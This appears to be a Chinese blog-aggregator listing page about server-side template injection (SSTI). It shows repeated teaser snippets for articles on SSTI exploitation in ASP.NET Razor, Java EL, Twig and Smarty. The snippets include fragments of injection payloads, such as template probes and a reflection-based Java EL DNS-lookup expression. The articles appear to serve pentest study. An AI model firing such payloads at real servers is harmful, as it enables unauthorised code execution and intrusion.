首页
编程日记
安装 教程 下载
cocos2d
windows安装nginx
python web
SSTI
2024/9/25 8:21:46
WEB渗透Web突破篇-SSTI
SSTI 服务端模板注入ASP.NET Razor (12) 命令执行 {// C# code }EL ${11} #{11} 不包括代码执行 // DNS Lookup ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","…
阅读更多...
Mac中Twig模版安装与SSTI漏洞学习
感谢大佬的文章参考学习。 SSTI:https://www.cnblogs.com/bmjoker/p/13508538.html Homebrew:快速开始 - Homebrew 中文网 Homebrew安装 一键快捷安装:默认使用中科大的源 /bin/bash -c "$(curl -fsSL https://gitee.com/ineo6/homeb…
阅读更多...
Mac中Twig模版安装与SSTI漏洞学习
感谢大佬的文章参考学习。 SSTI:https://www.cnblogs.com/bmjoker/p/13508538.html Homebrew:快速开始 - Homebrew 中文网 Homebrew安装 一键快捷安装:默认使用中科大的源 /bin/bash -c "$(curl -fsSL https://gitee.com/ineo6/homeb…
阅读更多...
深入解析Smarty SSTI 利用
Smarty Smarty是基于PHP开发的,对于Smarty的SSTI 的利用与常见的flask的SSTI有很大区别,了解过Jinjia2模板注入的应该知道,Jinjia2是基于python的,而Smarty是基于PHP的,所以使用起来还是比较容易地,我们只需…
阅读更多...
深入解析Smarty SSTI 利用
Smarty Smarty是基于PHP开发的,对于Smarty的SSTI 的利用与常见的flask的SSTI有很大区别,了解过Jinjia2模板注入的应该知道,Jinjia2是基于python的,而Smarty是基于PHP的,所以使用起来还是比较容易地,我们只需…
阅读更多...
WEB渗透Web突破篇-SSTI
SSTI 服务端模板注入ASP.NET Razor (12) 命令执行 {// C# code }EL ${11} #{11} 不包括代码执行 // DNS Lookup ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","…
阅读更多...